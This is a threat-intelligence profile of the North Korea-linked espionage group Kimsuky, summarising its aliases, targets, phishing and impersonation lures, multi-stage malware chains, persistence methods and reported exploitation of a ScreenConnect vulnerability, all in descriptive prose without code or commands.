Kimsuky

Kimsuky is a North Korea-linked, state-sponsored threat actor associated with the DPRK Reconnaissance General Bureau. It is tracked under numerous aliases including APT43, TA406, TA427, Thallium, Velvet Chollima, Emerald Sleet, Opal Sleet, Ruby Sleet, Cerium, Black Banshee, Springtail, Sparkling Pisces, Sharptongue, Osmium, and Konni Group/Konni APT. The content also notes that Proofpoint tracks Kimsuky activity as three separate threat actors: TA406, TA408, and TA427. Konni Group/TA406 is described as generally falling under the broader Kimsuky cluster, though KONNI malware has also been linked to other DPRK-associated actors in some reporting. The actor conducts cyber espionage and information theft, with targeting described against defense, political, and North Korea-related individuals; South Korean government officials; NGOs; government agencies; media companies; and Russian Ministry of Foreign Affairs interests. The content also describes targeting of Naver-related users and infrastructure, cryptocurrency websites, and technical employees at crypto exchanges in a suspected campaign. Kimsuky is explicitly described as a North Korean state-sponsored threat actor in reporting on intrusions into South Korean government systems. Kimsuky frequently relies on social engineering and impersonation. Reported personas included a foreign advisor, embassy employee, think tank employee, and a Japanese diplomat. In a 2025 campaign simulation attributed to Velvet Chollima, the actor reportedly masqueraded as South Korean government officials, built trust with targets, then sent spear-phishing emails with PDF attachments linking to fake CAPTCHA or device-registration pages. Victims were tricked via ClickFix-style prompts into launching PowerShell as administrator and executing attacker-supplied commands. The group uses multi-stage infection chains and varied delivery formats. In the GoldDragon cluster, Kimsuky used Word documents, HTML Applications, and CHM files, and abused legitimate Google blog services to host payloads. The campaign objective was information theft, including keyboard input, browser credentials and cookies, and screenshots. The actor minimized exposure of tooling through server-side victim validation, including email verification, IP matching, and a custom user-agent check for the string "chnome" before delivering later-stage payloads. The content also describes Kimsuky-linked malicious LNK campaigns using work-themed decoys such as a personal information consent form and a file named "260506_한국 핵추진잠수함 협력 전략과 로드맵.pdf.lnk." These LNK files executed obfuscated PowerShell, downloaded additional payloads from external sources or GitHub, used fileless execution, opened decoy documents, deleted the original shortcut, and established persistence via Task Scheduler. Observed follow-on payloads included information-stealing PowerShell scripts and backdoor loaders that decrypted and loaded malware into memory. Collected host data included security product information, OS, network settings, IP addresses, drive information, recently modified files, and running processes. Persistence and execution techniques mentioned in the content include creation of new services, PowerShell execution, Windows Run key persistence, and Windows service abuse. One KONNI case used a Windows service for persistence, AES-CTR-encrypted configuration keyed by the service name, and HTTP-based command execution, file upload/download, and configurable check-in intervals. The content also explicitly states that Kimsuky has created new services for persistence. Additional activity in the content includes confirmed real-world exploitation of CVE-2024-1709 in ConnectWise ScreenConnect by the Kimsuky group. Infrastructure overlap or suspected links are also noted in reporting on UNC3782 and the Android malware DocSwap, but those links are described as unclear or provisional rather than confirmed.